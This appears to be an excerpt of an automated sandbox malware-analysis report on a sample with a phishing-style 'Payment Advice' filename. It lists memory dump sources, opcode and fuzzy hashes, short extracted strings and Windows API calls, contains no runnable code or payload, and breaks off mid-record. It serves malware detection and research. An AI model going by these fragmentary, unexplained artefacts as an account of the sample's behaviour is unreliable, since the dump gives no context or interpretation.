                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                            • API String ID: 0-1677660839
                                                                                                                                            • Opcode ID: 54c639fdbacc6d8dae2a7820835d744f9105952df981f731eeefdcea271d0bf4
                                                                                                                                            • Instruction ID: e8f813eb4ba87561aa684a228c43abe04770b9629707620af1c4db0aec661743
                                                                                                                                            • Opcode Fuzzy Hash: 54c639fdbacc6d8dae2a7820835d744f9105952df981f731eeefdcea271d0bf4
                                                                                                                                            • Instruction Fuzzy Hash: 8F324A70E002189FEB94DFB8C8547AEBBF6BF84300F1485AAD409AB395DB349D45CB95

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fb37ac3854ece543ff227e9177da2af826bafddda7d01ae5ab38eb4b07dbe7ed
                                                                                                                                            • Instruction ID: cfa194d7e57826f43f65cddf7dfcc80a57e133509f9b76c68c65f500b2d8b68e
                                                                                                                                            • Opcode Fuzzy Hash: fb37ac3854ece543ff227e9177da2af826bafddda7d01ae5ab38eb4b07dbe7ed
                                                                                                                                            • Instruction Fuzzy Hash: 484309B4A10219CFDB15DF24C894BA9B7B5FF8A304F5182E9D6096B361DB30AE85CF44
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fcq
                                                                                                                                            • API String ID: 0-2768158334
                                                                                                                                            • Opcode ID: 2dabc6b70a4f996793dcb16c1c0c95e80c9803d9e5b1272ad30b607fb91e77d4
                                                                                                                                            • Instruction ID: 208bfe4d5e1a71bd0b48a3b208cb7964e06382a5067ca18047d7a16d8ca412a0
                                                                                                                                            • Opcode Fuzzy Hash: 2dabc6b70a4f996793dcb16c1c0c95e80c9803d9e5b1272ad30b607fb91e77d4
                                                                                                                                            • Instruction Fuzzy Hash: 9681D570E012199FDB09DFA9C894ADEBBB2FF88300F248529D409BB364DB359945CF90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fcq
                                                                                                                                            • API String ID: 0-2768158334
                                                                                                                                            • Opcode ID: e6e9121993605c9a1f9bbe7fbeaa2fee390e10a8a05076c6a5ec579b46a8ed26
                                                                                                                                            • Instruction ID: f0e821a7306ca29f365c916751b0a42b79ad901f7298d66e5d43a70dcf0331a1
                                                                                                                                            • Opcode Fuzzy Hash: e6e9121993605c9a1f9bbe7fbeaa2fee390e10a8a05076c6a5ec579b46a8ed26
                                                                                                                                            • Instruction Fuzzy Hash: 9F81D770E012199FDB09DFA9C894ADEBBB2FF88300F148529D409BB364DB359946CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74ef5f56f3e8a2d91fcf8d9fb967283e7fc29eb20b748688150a1c60599d91df
                                                                                                                                            • Instruction ID: b4fbbe92eb20e6e45c105b22410f235ca3cbb25d46ffebda66f292f9dbb1e2f5
                                                                                                                                            • Opcode Fuzzy Hash: 74ef5f56f3e8a2d91fcf8d9fb967283e7fc29eb20b748688150a1c60599d91df
                                                                                                                                            • Instruction Fuzzy Hash: 5DC18CB4E002189FDF94DFA4C880799BBF6EF88300F14D1AAD449AB255DB74DA85CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 13743a6b3aae0d25f8133075c25ac81e50bcccde1602a2427a544a1d3b82b75c
                                                                                                                                            • Instruction ID: 3b469233654f6432a5734a5bb5cc697e2706fbbc0e24e970fdb5d36aa4a67e28
                                                                                                                                            • Opcode Fuzzy Hash: 13743a6b3aae0d25f8133075c25ac81e50bcccde1602a2427a544a1d3b82b75c
                                                                                                                                            • Instruction Fuzzy Hash: 5EC16BB4E002189FDF94DF64C880799BBB6EF88300F14D1AAD449AB255DB74DA85CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1888433644.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1887651837.0000000007130000.00000004.08000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7130000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e0ae6484a79ef98396c6ae173d4a517e71ce07001b79dfff1cb1ee891d31ccf5
                                                                                                                                            • Instruction ID: c997f4125e11a5e85a45056c9facaa30fa60ade2500e404b3105f98f067aca82
                                                                                                                                            • Opcode Fuzzy Hash: e0ae6484a79ef98396c6ae173d4a517e71ce07001b79dfff1cb1ee891d31ccf5
                                                                                                                                            • Instruction Fuzzy Hash: BB21C7B0D146189BEB18CFABD9547EEFBF7AFC9300F04C16AD40966294EB7409458F90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq$Hbq
                                                                                                                                            • API String ID: 0-2297679979
                                                                                                                                            • Opcode ID: 65a49d0489b4102d2db7fd86b499bf414975e97b009426635e44e7014e5e0dd8
                                                                                                                                            • Instruction ID: 115c405fa7afc320b411adb0784a438aa61ef8d3a94a0e777c46f26ee3cf321c
                                                                                                                                            • Opcode Fuzzy Hash: 65a49d0489b4102d2db7fd86b499bf414975e97b009426635e44e7014e5e0dd8
                                                                                                                                            • Instruction Fuzzy Hash: BE418D343006108BEB696ABA922463F77EBFFC5245714896DD4028B794EF39EC03C769

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                            • API String ID: 0-4258043069

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                            • API String ID: 0-4258043069

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D51E02
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D51E02
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0

                                                                                                                                            APIs
                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D54381
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714655100-0

                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0

                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BD66E,?,?,?,?,?), ref: 025BD72F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BD66E,?,?,?,?,?), ref: 025BD72F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            APIs
                                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06BE2E6A,?,?,?,?,?), ref: 06BE2F0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1886011758.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6be0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB41E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB41E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (bq
                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: d8cq
                                                                                                                                            • API String ID: 0-3601494702
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Te^q
                                                                                                                                            • API String ID: 0-671973202
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq
                                                                                                                                            • API String ID: 0-1245868
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 90c3b5f98377ab3c1127fc40ff62f27ef5f2f8af175074b007899168ddc43dd2
                                                                                                                                            • Instruction ID: 8dca96f77409a36d1e8a805980be2378e6a992867ebbec6b090c9846eeecf148
                                                                                                                                            • Opcode Fuzzy Hash: 90c3b5f98377ab3c1127fc40ff62f27ef5f2f8af175074b007899168ddc43dd2
                                                                                                                                            • Instruction Fuzzy Hash: 7981B2347106148FCB14EF28D598A697BF6FF89B04B1581AAE606CB375DB71EC42CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4bbb512c22c25064bcfe6ec85cf0064f2bde5ca02e590a7d5f1125acac1cf3a0
                                                                                                                                            • Instruction ID: 28b735abf3be69241040e01d87161d4cbf9197caed1ea9d7e79fdd8a0ce2bc42
                                                                                                                                            • Opcode Fuzzy Hash: 4bbb512c22c25064bcfe6ec85cf0064f2bde5ca02e590a7d5f1125acac1cf3a0
                                                                                                                                            • Instruction Fuzzy Hash: 1C818335A10208DFCB04EFA4D8989ADBBB5FF89301F118559E542AB364EB70ED55CF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1f97bfdb27cabafe825a605e61d0584683f5fc11fb5f4307f86d51335f97ddca
                                                                                                                                            • Instruction ID: 161f5fe3c19b15e6437979fa4908c06e4b2bf1238652b710da0d68fa628a2d7f
                                                                                                                                            • Opcode Fuzzy Hash: 1f97bfdb27cabafe825a605e61d0584683f5fc11fb5f4307f86d51335f97ddca
                                                                                                                                            • Instruction Fuzzy Hash: F0517E71E102499FCF14EFA9C944AAFBBF5EF88310F10842AE455E3351EB34A9158BA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ddfc39a69e96aa6b0a2d9e084bf6e8efdf56893fefc02cde4069c9a481ebc46c
                                                                                                                                            • Instruction ID: 4582d92861757782744c6b5f985e48d1fed772ac00cd86bed4f050aac6766c86
                                                                                                                                            • Opcode Fuzzy Hash: ddfc39a69e96aa6b0a2d9e084bf6e8efdf56893fefc02cde4069c9a481ebc46c
                                                                                                                                            • Instruction Fuzzy Hash: DF416630B54258AFDB14DF69C894EADBBF6BF89305F1440A9E501EB3A2DB31E810CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 62f356e30387d9bb88b25bd76e33e9348af651b332d0a5540fadc0959aa51ed9
                                                                                                                                            • Instruction ID: 936cd2943028756f97e846f5f83247ce95dc73a1f229653bf5ab7d42bee14584
                                                                                                                                            • Opcode Fuzzy Hash: 62f356e30387d9bb88b25bd76e33e9348af651b332d0a5540fadc0959aa51ed9
                                                                                                                                            • Instruction Fuzzy Hash: 7B418735E00109DFDB14EF74C4547AD7AB2EF48318F14442AD61267344DF79A992CBA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 573ba6abfb06ecdf16ba31ad14327ab4f37a5693c84319a11c8640621275d5e7
                                                                                                                                            • Instruction ID: b630e97df14846fb236617810aea25c1c08f83a432cb777fa4370363d6aba5f6
                                                                                                                                            • Opcode Fuzzy Hash: 573ba6abfb06ecdf16ba31ad14327ab4f37a5693c84319a11c8640621275d5e7
                                                                                                                                            • Instruction Fuzzy Hash: 0A41187060011A9FCF059F64D864AAEBBA6FF84341F188529E80697394DB75EC66CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4ca39ba7aad68756a5de32128bbe65302fe36ea7b6e9ec5ee810495eab0b28e9
                                                                                                                                            • Instruction ID: cdaf8a9de26e89c08399c6db90edc699d751f220e4d5bb95ce06b9beaaa4cc01
                                                                                                                                            • Opcode Fuzzy Hash: 4ca39ba7aad68756a5de32128bbe65302fe36ea7b6e9ec5ee810495eab0b28e9
                                                                                                                                            • Instruction Fuzzy Hash: C5414131E20609DFCB04EFB8D954ADDBBB1FF49301F508269E94577250EB30AA99CB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d4be9e795a9a4e927d482d6feb1890a9d8dbfa21b09f045059a03bfb611201e2
                                                                                                                                            • Instruction ID: 600cf3eae7752bcf2ca3c6a937eb42e1427553f35a77207a0d139db8604741e1
                                                                                                                                            • Opcode Fuzzy Hash: d4be9e795a9a4e927d482d6feb1890a9d8dbfa21b09f045059a03bfb611201e2
                                                                                                                                            • Instruction Fuzzy Hash: 3941D1B1D002089FDB24DFE9C584ADEBBB5BF48304F64842AD408AB214D775AA4ACF90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fe9add4e91323db40fbd4e0f2506745ba48beccefbb7dc3e90e194d76f35bd9b
                                                                                                                                            • Instruction ID: e398b68911f3c69d95cb96677fc160631cbecab3065e382c9df3caea16852f51
